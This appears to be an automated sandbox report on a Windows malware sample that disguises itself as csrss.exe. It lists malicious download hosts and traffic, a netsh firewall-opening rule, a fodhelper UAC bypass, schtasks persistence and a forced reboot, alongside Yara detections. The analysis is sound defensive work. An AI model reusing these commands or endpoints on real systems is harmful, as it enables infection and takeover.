Source: csrss.exe, 00000014.00000003.213017406273.000000000C52C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210668268821.000000000C5AC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209403091208.000000000C5C4000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213015280823.000000000C5AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://twopixis.com/watchdog
Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://twopixis.com/watchdog/watchdog.exe
Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://twopixis.com/watchdog/watchdog.exeSETCONF
Source: csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://twopixis.com/watchdog/watchdog.exeno-store
Source: csrss.exe, 00000014.00000003.209403091208.000000000C5F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error
Source: csrss.exe, 00000014.00000003.213015103821.000000000C5F2000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213019914167.000000000C460000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211840953641.000000000C45E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209403091208.000000000C5F0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209393805620.000000000C6D8000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210667163276.000000000C5EE000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213017192448.000000000C544000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: unknown HTTP traffic detected: POST /api/restriction-us HTTP/1.1Host: server5.duniadekho.barUser-Agent: Go-http-client/1.1Content-Length: 152Content-Type: application/x-www-form-urlencodedVersion: 195Accept-Encoding: gzip
Source: unknown DNS traffic detected: queries for: ec87b504-92ea-4d22-a937-161700799581.uuid.duniadekho.bar
Source: global traffic HTTP traffic detected: GET /attachments/1087398815188910163/1087399133926674453/LZ.zip HTTP/1.1Host: cdn.discordapp.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581 HTTP/1.1Host: server5.duniadekho.barUser-Agent: Go-http-client/1.1Version: 195Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /watchdog/watchdog.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Uuid: ec87b504-92ea-4d22-a937-161700799581Version: 195Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /api/signature/21f67ca2e1b8b0405399c65a0e0d031e HTTP/1.1Host: server5.duniadekho.barUser-Agent: Go-http-client/1.1Uuid: ec87b504-92ea-4d22-a937-161700799581Version: 195Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /github-production-release-asset-2e65be/350494541/0257ea00-a853-11eb-8659-1a96e3eed860?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230528%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230528T093319Z&X-Amz-Expires=300&X-Amz-Signature=25a5fa811961f6d4a9ae1ad0a06038ccbf899e81292d2f437487b8af95f18898&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=350494541&response-content-disposition=attachment%3B%20filename%3Dopera-proxy.windows-386.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /watchdog/watchdog.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Uuid: ec87b504-92ea-4d22-a937-161700799581Version: 195Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /w/w-8-debug.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /gm-305-7507ffc9a340f774985cb5ca11ca78c4.exe HTTP/1.1Host: twopixis.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

E-Banking Fraud

Source: Yara match File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR

System Summary

Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: kdsyitkxmS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 58.3.csrss.exe.4331420.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 61.3.csrss.exe.4331420.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 10.3.kdsyitkxmS.exe.40e1420.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 23.3.csrss.exe.4331420.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 31.3.csrss.exe.431bb00.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 20.3.csrss.exe.4321700.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 55.3.csrss.exe.4321700.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 55.3.csrss.exe.4331420.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 10.3.kdsyitkxmS.exe.40d1700.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 40.3.csrss.exe.431bb00.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 23.3.csrss.exe.4321700.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 20.3.csrss.exe.3d00000.2.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 10.3.kdsyitkxmS.exe.3ab0000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 43.3.csrss.exe.4331420.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 40.3.csrss.exe.3d00000.5.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 43.3.csrss.exe.3d00000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 40.3.csrss.exe.4331420.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 20.3.csrss.exe.431bb00.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 43.3.csrss.exe.431bb00.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 55.3.csrss.exe.431bb00.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 61.3.csrss.exe.4321700.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 61.3.csrss.exe.431bb00.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 20.3.csrss.exe.4331420.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 4.3.kdsyitkxmS.exe.40abb00.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 50.3.csrss.exe.4321700.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
Source: 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 0000003A.00000003.208966850463.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 0000003D.00000003.209030995606.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 00000037.00000003.208942288673.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_by2l5cwc.djl.ps1
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File created: C:\Windows\rss
Source: bootx64.efi.20.dr Static PE information: No import functions for PE file found
Source: bootmgfw.efi.20.dr Static PE information: No import functions for PE file found
Source: EfiGuardDxe.efi.20.dr Static PE information: No import functions for PE file found
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesymsrv.dllj% vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWinmonFS.sysZ vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedsefix.exe. vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesymsrv.dllj% vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWinmonFS.sysZ vs kdsyitkxmS.exe
Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedsefix.exe. vs kdsyitkxmS.exe
Source: C:\Windows\System32\svchost.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Section loaded: msvcr100.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\servicing\TrustedInstaller.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: edgegdi.dll
Source: C:\Windows\rss\csrss.exe Section loaded: msvcr100.dll
Source: C:\Windows\System32\cmd.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\fodhelper.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\sc.exe Process token adjusted: Security
Source: kdsyitkxmS.exe Static PE information: invalid certificate
Source: zlib1.dll.20.dr Static PE information: Number of sections : 11 > 10
Source: libssp-0.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: libevent_core-2-1-7.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: libssl-1_1.dll.20.dr Static PE information: Number of sections : 19 > 10
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: libcrypto-1_1.dll.20.dr Static PE information: Number of sections : 19 > 10
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: libwinpthread-1.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: libevent-2-1-7.dll.20.dr Static PE information: Number of sections : 18 > 10
Source: kdsyitkxmS.exe Virustotal: Detection: 31%
Source: kdsyitkxmS.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File read: C:\Users\user\Desktop\kdsyitkxmS.exe
Source: kdsyitkxmS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
Source: unknown Process created: C:\Users\user\Desktop\kdsyitkxmS.exe C:\Users\user\Desktop\kdsyitkxmS.exe
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Users\user\Desktop\kdsyitkxmS.exe C:\Users\user\Desktop\kdsyitkxmS.exe
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
